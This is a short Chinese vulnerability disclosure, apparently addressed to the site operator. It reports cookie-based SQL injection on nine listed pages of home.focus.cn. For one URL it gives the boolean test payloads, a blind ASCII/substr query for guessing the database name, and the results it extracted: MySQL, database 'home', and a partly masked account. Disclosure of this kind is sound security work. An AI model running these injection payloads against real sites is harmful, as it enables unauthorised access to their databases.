下述url均存在cookie注入，厂商请注意修复。

1. http://home.focus.cn/newscenter/newscenter.php？subject_id=33&show_citynum=549755813888

2. http://home.focus.cn/jiancaicheng/index.php?city_id=39

3. http://home.focus.cn/elite/article_index.php?group_id=2513&class_id=857

4. http://home.focus.cn/group/class_photos_more.php?type=pic&class_id=18

5. http://home.focus.cn/msglist/1703/?chkusr_id=11179/

6. http://home.focus.cn/group/photo.php?group_id=1702

7. http://home.focus.cn/group/photoshow.php?photo_id=4160673&group_id=1702

8. http://home.focus.cn/life/news_week.php?days=7&category_id=2

9. http://home.focus.cn/life/newscenter.php?subject_id=9

以第2个url补图说明：

漏洞url：http://home.focus.cn/jiancaicheng/index.php?city_id=39

存在cookie注入的变量：city_id=39

测试payload（放到Cookie中）

1. city_id=39 anD 1=1正常页面

2. city_id=39 anD 1=11返回不一样

猜解数据库名语句：city_id=39 anD (select ascii(substr(database(),1,1)))>100

猜解过程省略,结果如下：

注入类型: 数字型

数据库类型: MySQL

数据库名: home

用户名: readonly@10.xx.xx.x

其余几处的注射方法同上述案例。

漏洞修复方法:请检查并修复漏洞吧，免得黑客看到漏洞就想钻